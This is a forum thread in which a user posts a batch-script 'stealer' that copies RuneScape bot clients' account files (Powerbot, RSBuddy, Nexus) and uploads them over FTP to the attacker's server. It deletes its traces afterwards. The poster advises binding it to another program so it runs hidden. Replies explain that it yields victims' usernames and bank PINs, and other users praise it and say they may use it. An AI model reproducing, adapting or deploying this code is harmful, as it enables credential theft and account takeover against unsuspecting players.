[Alpha] Worms Stealer [Powerbot] [Rsbuddy] [Nexus]

Worms

Onyx user!
Reputation
0
This is an Alpha version of my stealer. I'm working on the beta one, which has a GUI for making the stealer, and allow you to steal anything. Meanwhile this one steals Powerbot, Rsbuddy and Nexus files and send them via FTP. It's coded in batch, so save it as .bat after editing the FTP stuff.

Code:
@echo off
cls
copy %appdata%\rsbot* rsbot_%username%.ini 
cls
copy %appdata%\rsbuddy*.ini rsbuddy_%username%.ini
cls
copy c:\botclientnet\config\data.db nexusdata_%username%.db
cls
copy c:\botclient\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\botclientnet\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\desktop\botclientnet\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\downloads\botclientnet\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\documents\botclientnet\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\botclient\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\desktop\botclient\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\downloads\botclient\config\data.db nexusdata_%username%.db
cls
copy c:\users\%username%\documents\botclient\config\data.db nexusdata_%username%.db
cls
echo user USERNAMEHERE> ftpcmd.dat 
cls
echo PASSWORDHERE>>ftpcmd.dat
cls
echo cd public_html>> ftpcmd.dat 
cls
echo send rsbot*.ini>> ftpcmd.dat 
cls
echo send rsbuddy*.ini>> ftpcmd.dat 
cls
echo send nexus*.db>> ftpcmd.dat 
cls
echo disconnect>> ftpcmd.dat 
cls
echo bye>> ftpcmd.dat 
cls
ftp -v -n -i -s:ftpcmd.dat FTPHOSTHERE
cls
del ftpcmd.dat 
cls
del *.ini
cls
del *.db
cls

Don't forget to change:
USERNAMEHERE
PASSWORDHERE
FTPHOSTHERE

*It's recommended to bind that to some program and make it run hidden, i added all those "cls" so it wont show stuff but still in ftp connect they can see lines for about 3 seconds.
 

.Judgement

Onyx user!
Reputation
0
RE: [Alpha] Worms Stealer [Powerbot] [Rsbuddy] [Nexux]

Very good release worms.

Super original.



I suppose this is for binding? How did you end up fixing the variable bug?


+repped btw.
 

Worms

Onyx user!
Reputation
0
RE: [Alpha] Worms Stealer [Powerbot] [Rsbuddy] [Nexux]

Judgement said:
Very good release worms.

Super original.



I suppose this is for binding? How did you end up fixing the variable bug?


+repped btw.

Well, i didn't fix it up, thats why i didn't release with GUI and stuff. I'm still trying to fix it. Any yes, it is supossed to be binded. Thanks =D
 
Reputation
0
Thanks for this when is the realese?
 

Worms

Onyx user!
Reputation
0
Josh said:
Thanks for this when is the realese?

Whenever i fix a stupid error i get on a variable because microssoft hates me
 
Reputation
0
How exactly does this work?
Does it steal Runescape account(s).
That'll be very useful :)
 

Worms

Onyx user!
Reputation
0
Godlike said:
How exactly does this work?
Does it steal Runescape account(s).
That'll be very useful :)

It steal the accounts .ini from the bots mentioned. It will show ther username and bank pin, but password is crypted. Can be useful if you RAT someone and know their login and pass but don't know their pin. Also, Nexus data.db might not be crypted, in this case you can just login on their account using the bot and you win XD
 

Worms

Onyx user!
Reputation
0
Josh said:
So does it make it like a keylogger, do u make one? and we do it and add the USERNAME
PASSWORD
PIN OR W.E

No, the username pass and host are the FTP details that you need to fill, so the accs go right to your host.
 
Reputation
0
So this is like a script that gets you who ever downloads it and uses it?
Or how exactly does that work. LOL
 

Worms

Onyx user!
Reputation
0
Godlike said:
So this is like a script that gets you who ever downloads it and uses it?
Or how exactly does that work. LOL

The victim runs it, it sends files to your FTP.
 

Worms

Onyx user!
Reputation
0
Merlin said:
I love you so much, bro your the best.

Thanks :D

It's good when you do something that people actually like
 

Cannabis

Onyx user!
Reputation
0
Thanks for the share, might use it.
 
Top